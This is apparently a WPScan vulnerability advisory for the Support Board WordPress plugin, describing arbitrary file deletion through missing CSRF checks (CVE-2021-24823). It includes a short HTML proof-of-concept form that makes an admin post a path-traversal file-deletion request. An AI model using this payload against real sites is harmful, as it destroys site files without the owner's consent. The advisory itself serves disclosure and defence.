WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Support Board < 3.3.6 - Arbitrary File Deletion via CSRF

Description

The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-content/plugins/supportboard/supportboard/include/ajax.php" method="POST">
      <input type="hidden" name="function" value="delete-file" />
      <input type="hidden" name="path" value="/../yolo.php" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

supportboard
Fixed in version 3.3.5

References

CVE
CVE-2021-24823
URL
https://noob3xploiter.medium.com/support-board-3-3-4-arbitrary-file-deletion-to-remote-code-execution-da4c45b45c83

YouTube Video

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
1bdebd9e-a7f2-4f55-b5b0-185eb619ebaf

Timeline

Publicly Published

2021-10-18 (about 1 years ago)

Added

2022-01-26 (about 1 years ago)

Last Updated

2022-04-08 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin